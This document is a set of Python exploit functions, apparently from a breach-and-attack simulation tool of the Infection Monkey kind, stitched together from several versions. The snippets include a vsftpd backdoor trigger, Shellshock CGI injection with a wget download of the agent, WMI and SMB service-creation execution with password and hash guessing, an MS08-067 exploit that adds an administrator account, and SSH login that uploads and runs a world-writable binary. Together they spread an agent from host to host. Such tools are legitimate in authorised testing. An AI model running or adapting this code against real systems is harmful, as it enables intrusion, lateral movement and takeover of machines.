def execute_remote_monkey(self, url, path, dropper=False): """ This method executes remote monkey :param url: Where to send malicious packets :param path: Path to monkey on remote host :param dropper: Should remote monkey be executed with dropper or with monkey arg? :return: Response or False if failed """ LOG.info("Trying to execute remote monkey") # Get monkey command line if dropper and path: # If dropper is chosen we try to move monkey to default location default_path = self.get_default_dropper_path() if default_path is False: return False monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path) command = RUN_MONKEY % { 'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd } else: monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, self.vulnerable_port) command = RUN_MONKEY % { 'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd } try: LOG.info( "Trying to execute monkey using command: {}".format(command)) resp = self.exploit(url, command) # If exploiter returns True / False if isinstance(resp, bool): LOG.info("Execution attempt successfully finished") self.add_executed_cmd(command) return resp # If exploiter returns command output, we can check for execution errors if 'is not recognized' in resp or 'command not found' in resp: LOG.error( "Wrong path chosen or other process already deleted monkey" ) return False elif 'The system cannot execute' in resp: LOG.error("System could not execute monkey") return False except Exception as e: LOG.error( "Something went wrong when trying to execute remote monkey: %s" % e) return False LOG.info("Execution attempt finished") self.add_executed_cmd(command) return resp
def _run_monkey_executable_on_victim(self, executable_path) -> None: monkey_execution_command = build_monkey_execution_command( self.host, get_monkey_depth() - 1, executable_path) logger.info(f"Attempting to execute the monkey agent on remote host " f"{self.host.ip_addr}") self._client.execute_cmd_as_detached_process(monkey_execution_command)
def get_monkey_launch_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) # Form monkey's launch command monkey_args = build_monkey_commandline(self.host, get_monkey_depth() - 1, dst_path) suffix = ">>{}".format(self.payload_file_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), prefix=prefix, suffix=suffix)
def build_command(self, path, http_path): # Build command to execute monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1) if 'linux' in self.host.os['type']: base_command = HADOOP_LINUX_COMMAND else: base_command = HADOOP_WINDOWS_COMMAND return base_command % { "monkey_path": path, "http_path": http_path, "monkey_type": MONKEY_ARG, "parameters": monkey_cmd }
def _build_command(self, path, http_path) -> str: # Build command to execute monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path) if "linux" in self.host.os["type"]: base_command = LOG4SHELL_LINUX_COMMAND else: base_command = LOG4SHELL_WINDOWS_COMMAND return base_command % { "monkey_path": path, "http_path": http_path, "monkey_type": DROPPER_ARG, "parameters": monkey_cmd, }
def build_command(self, path, http_path): # Build command to execute monkey_cmd = build_monkey_commandline( self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]) if "linux" in self.host.os["type"]: base_command = HADOOP_LINUX_COMMAND else: base_command = HADOOP_WINDOWS_COMMAND return base_command % { "monkey_path": path, "http_path": http_path, "monkey_type": MONKEY_ARG, "parameters": monkey_cmd, }
def _exploit_host(self): LOG.info("Attempting to trigger the Backdoor..") ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): ftp_socket.recv(RECV_128).decode('utf-8') if self.socket_send_recv(ftp_socket, USERNAME + '\n'): time.sleep(FTP_TIME_BUFFER) self.socket_send(ftp_socket, PASSWORD + '\n') ftp_socket.close() LOG.info('Backdoor Enabled, Now we can run commands') else: LOG.error('Failed to trigger backdoor on %s', self.host.ip_addr) return False LOG.info('Attempting to connect to backdoor...') backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT): LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) uname_m = str.encode(UNAME_M + '\n') response = self.socket_send_recv(backdoor_socket, uname_m) if response: LOG.info('Response for uname -m: %s', response) if '' != response.lower().strip(): # command execution is successful self.host.os['machine'] = response.lower().strip() self.host.os['type'] = 'linux' else: LOG.info("Failed to execute command uname -m on victim %r ", self.host) src_path = get_target_monkey(self.host) LOG.info("src for suitable monkey executable for host %r is %s", self.host, src_path) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False # Create a http server to host the monkey http_path, http_thread = HTTPTools.create_locked_transfer( self.host, src_path) dropper_target_path_linux = self._config.dropper_target_path_linux LOG.info("Download link for monkey is %s", http_path) # Upload the monkey to the machine monkey_path = dropper_target_path_linux download_command = WGET_HTTP_UPLOAD % { 'monkey_path': monkey_path, 'http_path': http_path } download_command = str.encode(str(download_command) + '\n') LOG.info("Download command is %s", download_command) if self.socket_send(backdoor_socket, download_command): LOG.info('Monkey is now Downloaded ') else: LOG.error('Failed to download monkey at %s', self.host.ip_addr) return False http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() # Change permissions change_permission = CHMOD_MONKEY % {'monkey_path': monkey_path} change_permission = str.encode(str(change_permission) + '\n') LOG.info("change_permission command is %s", change_permission) backdoor_socket.send(change_permission) T1222Telem(ScanStatus.USED, change_permission, self.host).send() # Run monkey on the machine parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1) run_monkey = RUN_MONKEY % { 'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters } # Set unlimited to memory # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit run_monkey = ULIMIT_V + UNLIMITED + run_monkey run_monkey = str.encode(str(run_monkey) + '\n') time.sleep(FTP_TIME_BUFFER) if backdoor_socket.send(run_monkey): LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, run_monkey) self.add_executed_cmd(run_monkey) return True else: return False
def _exploit_host(self): src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False creds = self._config.get_exploit_user_password_or_hash_product() for user, password, lm_hash, ntlm_hash in creds: password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() try: wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash) except AccessDeniedException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) continue except DCERPCException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) continue except socket.error: LOG.debug(("Network error in WMI connection to %r with " % self.host) + creds_for_logging) return False except Exception as exc: LOG.debug(("Unknown WMI connection error to %r with " % self.host) + creds_for_logging + (" (%s):\n%s" % (exc, traceback.format_exc()))) return False self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) # query process list and check if monkey already running on victim process_list = WmiTools.list_object(wmi_connection, "Win32_Process", fields=("Caption", ), where="Name='%s'" % ntpath.split(src_path)[-1]) if process_list: wmi_connection.close() LOG.debug("Skipping %r - already infected", self.host) return False # copy the file remotely using SMB remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, user, password, lm_hash, ntlm_hash, self._config.smb_download_timeout) if not remote_full_path: wmi_connection.close() return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower( ) != self._config.dropper_target_path_win_32.lower(): cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT, self._config.dropper_target_path_win_32) else: cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT) # execute the remote monkey result = WmiTools.get_object(wmi_connection, "Win32_Process").Create( cmdline, ntpath.split(remote_full_path)[0], None) if (0 != result.ProcessId) and (not result.ReturnValue): LOG.info( "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", remote_full_path, self.host, result.ProcessId, cmdline) self.add_vuln_port(port='unknown') success = True else: LOG.debug( "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)", remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline) success = False result.RemRelease() wmi_connection.close() self.add_executed_cmd(cmdline) return success return False
def _exploit_host(self): src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False creds = self._config.get_exploit_user_password_or_hash_product() exploited = False for user, password, lm_hash, ntlm_hash in creds: try: # copy the file remotely using SMB remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, user, password, lm_hash, ntlm_hash, self._config.smb_download_timeout) if remote_full_path is not None: LOG.debug( "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)", self.host, user, self._config.hash_sensitive_data(password), self._config.hash_sensitive_data(lm_hash), self._config.hash_sensitive_data(ntlm_hash)) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.add_vuln_port( "%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) exploited = True break else: # failed exploiting with this user/pass self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) except Exception as exc: LOG.debug( "Exception when trying to copy file using SMB to %r with user:"******" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)", self.host, user, self._config.hash_sensitive_data(password), self._config.hash_sensitive_data(lm_hash), self._config.hash_sensitive_data(ntlm_hash), exc) continue if not exploited: LOG.debug("Exploiter SmbExec is giving up...") return False self.set_vulnerable_port(self.host) # execute the remote dropper in case the path isn't final if remote_full_path.lower( ) != self._config.dropper_target_path_win_32.lower(): cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1, self.vulnerable_port, self._config.dropper_target_path_win_32) else: cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port) smb_conn = False for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory( str_bind_format % (self.host.ip_addr, )) rpctransport.set_dport(port) if hasattr(rpctransport, 'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None) rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS) scmr_rpc = rpctransport.get_dce_rpc() try: scmr_rpc.connect() except Exception as exc: LOG.debug( "Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc) continue smb_conn = rpctransport.get_smb_connection() break if not smb_conn: return False # We don't wanna deal with timeouts from now on. smb_conn.setTimeout(100000) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(scmr_rpc) sc_handle = resp['lpScHandle'] # start the monkey using the SCM resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name, lpBinaryPathName=cmdline) service = resp['lpServiceHandle'] try: scmr.hRStartServiceW(scmr_rpc, service) status = ScanStatus.USED except: status = ScanStatus.SCANNED pass T1035Telem(status, UsageEnum.SMB).send() scmr.hRDeleteService(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service) LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", remote_full_path, self.host, cmdline) self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) return True
def _exploit_host(self): # start by picking ports candidate_services = { service: self.host.services[service] for service in self.host.services if ("name" in self.host.services[service]) and ( self.host.services[service]["name"] == "http") } valid_ports = [ (port, candidate_services["tcp-" + str(port)]["data"][1]) for port in self.HTTP if "tcp-" + str(port) in candidate_services ] http_ports = [port[0] for port in valid_ports if not port[1]] https_ports = [port[0] for port in valid_ports if port[1]] LOG.info("Scanning %s, ports [%s] for vulnerable CGI pages" % (self.host, ",".join([str(port[0]) for port in valid_ports]))) attackable_urls = [] # now for each port we want to check the entire URL list for port in http_ports: urls = self.check_urls(self.host.ip_addr, port) attackable_urls.extend(urls) for port in https_ports: urls = self.check_urls(self.host.ip_addr, port, is_https=True) attackable_urls.extend(urls) # now for each URl we want to try and see if it's attackable exploitable_urls = [ self.attempt_exploit(url) for url in attackable_urls ] exploitable_urls = [url for url in exploitable_urls if url[0] is True] # we want to report all vulnerable URLs even if we didn't succeed self.exploit_info["vulnerable_urls"] = [ url[1] for url in exploitable_urls ] # now try URLs until we install something on victim for _, url, header, exploit in exploitable_urls: LOG.info("Trying to attack host %s with %s URL" % (self.host, url)) # same attack script as sshexec # for any failure, quit and don't try other URLs if not self.host.os.get("type"): try: uname_os_attack = exploit + "/bin/uname -o" uname_os = self.attack_page(url, header, uname_os_attack) if "linux" in uname_os: self.host.os["type"] = "linux" else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False except Exception as exc: LOG.debug( "Error running uname os command on victim %r: (%s)", self.host, exc) return False if not self.host.os.get("machine"): try: uname_machine_attack = exploit + "/bin/uname -m" uname_machine = self.attack_page(url, header, uname_machine_attack) if "" != uname_machine: self.host.os["machine"] = uname_machine.lower().strip() except Exception as exc: LOG.debug( "Error running uname machine command on victim %r: (%s)", self.host, exc) return False # copy the monkey dropper_target_path_linux = self._config.dropper_target_path_linux if self.skip_exist and (self.check_remote_file_exists( url, header, exploit, dropper_target_path_linux)): LOG.info( "Host %s was already infected under the current configuration, " "done" % self.host) return True # return already infected src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False if not self._create_lock_file(exploit, url, header): LOG.info("Another monkey is running shellshock exploit") return True http_path, http_thread = HTTPTools.create_transfer( self.host, src_path) if not http_path: LOG.debug( "Exploiter ShellShock failed, http transfer creation failed." ) return False download_command = "/usr/bin/wget %s -O %s;" % ( http_path, dropper_target_path_linux) download = exploit + download_command self.attack_page( url, header, download ) # we ignore failures here since it might take more than TIMEOUT time http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ("ELF" not in self.check_remote_file_exists( url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue # turn the monkey into an executable chmod = "/bin/chmod +x %s" % dropper_target_path_linux run_path = exploit + chmod self.attack_page(url, header, run_path) T1222Telem(ScanStatus.USED, chmod, self.host).send() # run the monkey cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) cmdline += build_monkey_commandline( self.host, get_monkey_depth() - 1, HTTPTools.get_port_from_url(url), dropper_target_path_linux, ) cmdline += " & " run_path = exploit + cmdline self.attack_page(url, header, run_path) LOG.info( "Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, cmdline, ) if not (self.check_remote_file_exists( url, header, exploit, self._config.monkey_log_path_linux)): LOG.info("Log file does not exist, monkey might not have run") continue self.add_executed_cmd(cmdline) return True return False
def _exploit_host(self): port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in list(self.host.services.items()): if servdata.get("name") == "ssh" and servkey.startswith("tcp-"): port = int(servkey.replace("tcp-", "")) is_open, _ = check_tcp_port(self.host.ip_addr, port) if not is_open: logger.info("SSH port is closed on %r, skipping", self.host) return False try: ssh = self.exploit_with_ssh_keys(port) except FailedExploitationError: try: ssh = self.exploit_with_login_creds(port) except FailedExploitationError: logger.debug("Exploiter SSHExploiter is giving up...") return False if not self.host.os.get("type"): try: _, stdout, _ = ssh.exec_command("uname -o") uname_os = stdout.read().lower().strip().decode() if "linux" in uname_os: self.host.os["type"] = "linux" else: logger.info("SSH Skipping unknown os: %s", uname_os) return False except Exception as exc: logger.debug("Error running uname os command on victim %r: (%s)", self.host, exc) return False if not self.host.os.get("machine"): try: _, stdout, _ = ssh.exec_command("uname -m") uname_machine = stdout.read().lower().strip().decode() if "" != uname_machine: self.host.os["machine"] = uname_machine except Exception as exc: logger.debug( "Error running uname machine command on victim %r: (%s)", self.host, exc ) if self.skip_exist: _, stdout, stderr = ssh.exec_command( "head -c 1 %s" % self._config.dropper_target_path_linux ) stdout_res = stdout.read().strip() if stdout_res: # file exists logger.info( "Host %s was already infected under the current configuration, " "done" % self.host ) return True # return already infected src_path = get_target_monkey(self.host) if not src_path: logger.info("Can't find suitable monkey executable for host %r", self.host) return False try: ftp = ssh.open_sftp() self._update_timestamp = time.time() with monkeyfs.open(src_path) as file_obj: ftp.putfo( file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), callback=self.log_transfer, ) ftp.chmod(self._config.dropper_target_path_linux, 0o777) status = ScanStatus.USED T1222Telem( ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host, ).send() ftp.close() except Exception as exc: logger.debug("Error uploading file into victim %r: (%s)", self.host, exc) status = ScanStatus.SCANNED T1105Telem( status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path ).send() if status == ScanStatus.SCANNED: return False try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline( self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT ) cmdline += " > /dev/null 2>&1 &" ssh.exec_command(cmdline) logger.info( "Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, cmdline, ) ssh.close() self.add_executed_cmd(cmdline) return True except Exception as exc: logger.debug("Error running monkey on victim %r: (%s)", self.host, exc) return False
def get_monkey_commandline_file(self, location): return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)))
def get_monkey_commandline_file(self, location): return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, str(location)))
def _exploit_host(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in self.host.services.items(): if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): port = int(servkey.replace('tcp-', '')) is_open, _ = check_tcp_port(self.host.ip_addr, port) if not is_open: LOG.info("SSH port is closed on %r, skipping", self.host) return False # Check for possible ssh exploits exploited = self.exploit_with_ssh_keys(port, ssh) if not exploited: exploited = self.exploit_with_login_creds(port, ssh) if not exploited: LOG.debug("Exploiter SSHExploiter is giving up...") return False if not self.host.os.get('type'): try: _, stdout, _ = ssh.exec_command('uname -o') uname_os = stdout.read().lower().strip() if 'linux' in uname_os: self.host.os['type'] = 'linux' else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False except Exception as exc: LOG.debug("Error running uname os commad on victim %r: (%s)", self.host, exc) return False if not self.host.os.get('machine'): try: _, stdout, _ = ssh.exec_command('uname -m') uname_machine = stdout.read().lower().strip() if '' != uname_machine: self.host.os['machine'] = uname_machine except Exception as exc: LOG.debug( "Error running uname machine commad on victim %r: (%s)", self.host, exc) if self.skip_exist: _, stdout, stderr = ssh.exec_command( "head -c 1 %s" % self._config.dropper_target_path_linux) stdout_res = stdout.read().strip() if stdout_res: # file exists LOG.info( "Host %s was already infected under the current configuration, done" % self.host) return True # return already infected src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False try: ftp = ssh.open_sftp() self._update_timestamp = time.time() with monkeyfs.open(src_path) as file_obj: ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), callback=self.log_transfer) ftp.chmod(self._config.dropper_target_path_linux, 0o777) status = ScanStatus.USED T1222Telem( ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send() ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) status = ScanStatus.SCANNED T1105Telem(status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path).send() if status == ScanStatus.SCANNED: return False try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) cmdline += "&" ssh.exec_command(cmdline) LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, cmdline) ssh.close() self.add_executed_cmd(cmdline) return True except Exception as exc: LOG.debug("Error running monkey on victim %r: (%s)", self.host, exc) return False
def _exploit_host(self): src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False os_version = self._windows_versions.get(self.host.os.get('version'), WindowsVersion.Windows2003_SP2) exploited = False for _ in range(self._config.ms08_067_exploit_attempts): exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version) try: sock = exploit.start() sock.send( "cmd /c (net user {} {} /add) &&" " (net localgroup administrators {} /add)\r\n".format( self._config.user_to_add, self._config.remote_user_pass, self._config.user_to_add).encode()) time.sleep(2) reply = sock.recv(1000) LOG.debug("Exploited into %r using MS08-067", self.host) exploited = True break except Exception as exc: LOG.debug("Error exploiting victim %r: (%s)", self.host, exc) continue if not exploited: LOG.debug("Exploiter MS08-067 is giving up...") return False # copy the file remotely using SMB remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, self._config.user_to_add, self._config.remote_user_pass) if not remote_full_path: # try other passwords for administrator for password in self._config.exploit_password_list: remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, "Administrator", password) if remote_full_path: break if not remote_full_path: return False # execute the remote dropper in case the path isn't final if remote_full_path.lower( ) != self._config.dropper_target_path_win_32.lower(): cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32) else: cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1) try: sock.send("start %s\r\n" % (cmdline, )) sock.send("net user %s /delete\r\n" % (self._config.user_to_add, )) except Exception as exc: LOG.debug( "Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc) return False finally: try: sock.close() except socket.error: pass LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", remote_full_path, self.host, cmdline) return True